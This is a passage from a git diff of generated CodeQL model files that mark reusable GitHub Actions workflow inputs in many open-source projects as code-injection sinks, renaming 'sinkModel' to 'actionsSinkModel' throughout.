9e9da70e88ec..383a88ed0556 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 8de3f4c1ca4a..bcd3b09ed688 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 5ec8c0969346..53e16f8771a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index af9582282d0d..4310e028de16 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 61bbb9d53728..84d2f57a3fbc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index fdb440a742ff..7debf6960edc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index efd05d69abe4..640180b870af 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 9be191425ffd..7ea3039b552b 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 65a14c7cfaa1..ced66aee32f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 2c031ea9dc62..e63440d1fcae 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index b90aacee9ca1..f7021148c514 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 56823f4e1acc..8345368057c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 0f2937f9d148..3754ebfa63d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index a88c74f85375..3e35747b558a 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index b7dfd8fcc9b1..a13f6863caa5 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 9de8130a93e6..af5c300ea8bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ea4980b8cd7a..449ea8b7b490 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 8787c7e32c9a..6656d42c4e69 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index ea55d53c215f..6e7fdc34a54b 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index add2fe0d2e2e..8fc02a27e1cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 400cd50b59f9..80f19676b4a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 42122b5ee22a..56b2ef6691e4 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index c694d3953f63..7bc952a84834 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 9ecf401cab50..1c0663dd01c6 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 19fee627702a..4da8f3276622 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4eb201001e14..4e8adfafe3c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 94c7292b655e..28cb702ce13c 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 6088ffcd7023..cb315ee4328c 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 05c4dc8ddf37..956c4cba9669 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index affc12cdc4ad..804c1bdae4e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index b1c4d2f2cbfd..78d91b2afb5f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 4ccbd71f8c36..31cadc3ff179 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 2eb2104b542a..11362fda1e55 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index fee958600308..131cff3e92a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 49a98d4dda55..acc5bf51e357 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index aa432107a0d1..c89d1c808c30 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 40053c68c1a2..0258c79e83f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 645ec756783f..ebeba1eb2268 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 3d80594c0d5e..5f709385839a 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e542d409efe8..e96dbba0699d 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 9cc02d3b38c7..2a7a9afd5a68 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5ebf7426d167..5094422f3fed 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index c5630248f7f9..dff837456454 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 4ea93f374b3c..88b68dc4ea7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index d702e7ad830a..18c6974c74f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - 